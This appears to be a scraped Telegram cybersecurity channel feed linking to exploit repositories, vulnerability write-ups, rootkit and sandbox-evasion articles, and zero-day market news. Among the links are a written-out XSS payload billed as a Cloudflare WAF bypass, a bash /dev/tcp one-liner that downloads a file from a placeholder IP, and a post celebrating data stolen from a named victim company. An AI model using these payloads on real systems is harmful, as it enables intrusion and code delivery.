https://github.com/utkusen/baitroute
https://utkusen.substack.com/p/how-to-create-vulnerable-looking
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - utkusen/baitroute: A web honeypot library to create vulnerable-looking endpoints to detect and mislead attackers
A web honeypot library to create vulnerable-looking endpoints to detect and mislead attackers - utkusen/baitroute
๐ฅ3
This media is not supported in your browser
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ2๐1๐ค1๐คฃ1
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
The Patch Report for January 2025
#ThePatchReport #ZeroDayInitiative #0day
Welcome to the January 2025 edition of the Patch Report - our brief look into the latest security updates from Microsoft, Adobe, and beyond. It's a small release from Adobe, but it's the largest patch Tuesday in Microsoft'sโฆ
Welcome to the January 2025 edition of the Patch Report - our brief look into the latest security updates from Microsoft, Adobe, and beyond. It's a small release from Adobe, but it's the largest patch Tuesday in Microsoft'sโฆ
https://www.wiz.io/blog/wiz-research-uncovers-exposed-deepseek-database-leak
Please open Telegram to view this post
VIEW IN TELEGRAM
wiz.io
Wiz Research Uncovers Exposed DeepSeek Database Leaking Sensitive Information, Including Chat History | Wiz Blog
A publicly accessible database belonging to DeepSeek allowed full control over database operations, including the ability to access internal data. The exposure includes over a million lines of log streams with highly sensitive information.
๐ฅ2๐ฅฑ1
This media is not supported in your browser
VIEW IN TELEGRAM
The CCTV footage and other documents were also exfilterated during the Cyber-Attack.
Victim organisation: Tosaf, Israel
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ7๐1๐1
Alleged Cloudflare XSS protection bypass: โ๏ธ
"><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))>๐ | 0x0SojalSec
๐ค2
Researcher: M-ShameemPlease open Telegram to view this post
VIEW IN TELEGRAM
https://github.com/wh1te4ever/WebKit-Bug-256172
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - wh1te4ever/WebKit-Bug-256172: Safari 1day RCE Exploit
Safari 1day RCE Exploit. Contribute to wh1te4ever/WebKit-Bug-256172 development by creating an account on GitHub.
๐ฅ1 1
https://blog.quarkslab.com/first-analysis-of-apples-usb-restricted-mode-bypass-cve-2025-24200.html
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ1 1
Please open Telegram to view this post
VIEW IN TELEGRAM
inferi.club
The Art of Linux Kernel Rootkits
An advanced and deep introduction about Linux kernel mode rookits, how to detect, what are hooks and how it works.
๐2
Exploiting Statistical Weaknesses in Human Interaction Anti-Evasions.
https://research.checkpoint.com/2025/the-cat-and-mouse-game-exploiting-statistical-weaknesses-in-human-interaction-anti-evasions/
Please open Telegram to view this post
VIEW IN TELEGRAM
Check Point Research
The Cat and Mouse Game: Exploiting Statistical Weaknesses in Human Interaction Anti-Evasions - Check Point Research
Executive Summary Why We Care about Sandbox Emulation As a discipline, information security involves a vast web of entry vectors, mitigations, and counter-mitigations. Among these, one of the most impactful points of conflict between attackers and defendersโฆ
bash-c "exec 3<>/dev/tcp/IP/80; echo -e GET/ youfile.sh HTTP/1.1\r\nHost; ip\r\nConnection: close\r\n\r\n' >&3; cat <&3-> yourfile.sh'Source: Linkedin | Harvey Spec
Please open Telegram to view this post
VIEW IN TELEGRAM
๐5
This media is not supported in your browser
VIEW IN TELEGRAM
Dangerous AI communication.
GibberLink mode.
Source: https://www.linkedin.com/in/georgi-gerganov-b230ab24
๐คฃ4
Please open Telegram to view this post
VIEW IN TELEGRAM
๐คฉ1
https://github.com/WafflesExploits/hide-payload-in-images
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - andrecrafts/hide-payload-in-images: A project that demonstrates embedding shellcode payloads into image files (like PNGs)โฆ
A project that demonstrates embedding shellcode payloads into image files (like PNGs) using Python and extracting them using C/C++. Payloads can be retrieved directly from the file on disk or from ...
https://www.hackers-arise.com/post/new-no-click-critical-vulnerability-in-microsoft-windows-cve-2025-21298
Please open Telegram to view this post
VIEW IN TELEGRAM
Hackers Arise - EXPERT CYBERSECURITY TRAINING FOR ETHICAL HACKERS
NEW No-Click Critical Vulnerability in Microsoft Windows: CVE-2025-21298 - Hackers Arise
Welcome back, my aspiring cyberwarriors! Over the years, Microsoft Windows operating system, the world's most widely used OS, has been riddled with security vulnerabilities. As the years have gone by and Microsoft has become more security conscience, theโฆ
๐1๐1๐คก1
https://techcrunch.com/2025/03/21/russian-zero-day-seller-is-offering-up-to-4-million-for-telegram-exploits/
Please open Telegram to view this post
VIEW IN TELEGRAM
TechCrunch
Russian zero-day seller is offering up to $4 million for Telegram exploits | TechCrunch
Two sources in the zero-day industry say Operation Zero's prices for exploits against the popular messaging app Telegram will depend on different factors.
๐2